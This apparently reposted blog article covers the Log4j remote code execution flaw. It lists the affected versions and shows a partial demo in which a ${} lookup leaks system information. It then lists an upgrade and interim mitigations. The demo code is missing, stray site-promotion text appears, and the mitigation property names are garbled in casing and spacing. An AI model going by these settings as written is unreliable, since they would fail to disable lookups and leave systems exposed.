Log4j vulnerability fixes and interim remedies

Time:2022-1-13

1.2 vulnerability rating and impact version

Apache log4j remote code execution vulnerability is serious

Version range affected: Apache log4j 2.0 x <= 2.14.1

2. Simple demonstration of log4j2 vulnerability

Create Maven project

Introducing jar package dependency

<dependencies>
        <dependency>
            <groupId>org.apache.logging.log4j</groupId>
            <artifactId>log4j-api</artifactId>
            <version>2.14.0</version>
        </dependency>
        <dependency>
            <groupId>org.apache.logging.log4j</groupId>
            <artifactId>log4j-core</artifactId>
            <version>2.14.0</version>
        </dependency>
    </dependencies>

Write log4j2 configuration file

<? xml version="1.0" encoding="UTF-8"?>

Create test class log4j2demo

//Java project fhadmin cn

Operation results

[INFO] Building log4j2-bug-test 1.0-SNAPSHOT
[INFO] --------------------------------[ jar ]---------------------------------
[INFO] 
[INFO] --- exec-maven-plugin:3.0.0:exec (default-cli) @ log4j2-bug-test ---
2021-12-11 11:44:14,654  INFO Log4j2Demo:12 - Hello, Windows 10 10.0, architecture: amd64-64
[INFO] ------------------------------------------------------------------------
[INFO] BUILD SUCCESS
[INFO] ------------------------------------------------------------------------
[INFO] Total time:  1.140 s
[INFO] Finished at: 2021-12-11T11:44:14+08:00
[INFO] ------------------------------------------------------------------------

We can see that vulnerability injection can be realized by using ${}. Assuming username is the input box for user login, we can inject from this input box, which can check and see some background system information. If a hacker is writing malicious code injection using JNDI, the consequences will be very serious.

3. Log4j2 quick repair measures

Modify log4j2 version

According to the latest official information of Apache, log4j version 2.15.0 has been updated on the release page, mainly the log4j core package. The vulnerability is generated in this package. If your program is useful, upgrade it urgently as soon as possible (Java project fhadmin. CN).

Interim solution

1. Set JVM parameter “- dlog4j2. Formatmsgnolookups = true”

2. Set “log4j2. Formatmsgnolookups = true”

3. Set the system environment variable “format_messages_pattern_disable_lookups” to “true”

4. Turn off the network external connection of the corresponding application and prohibit active external connection

This work adoptsCC agreement, reprint must indicate the author and the link to this article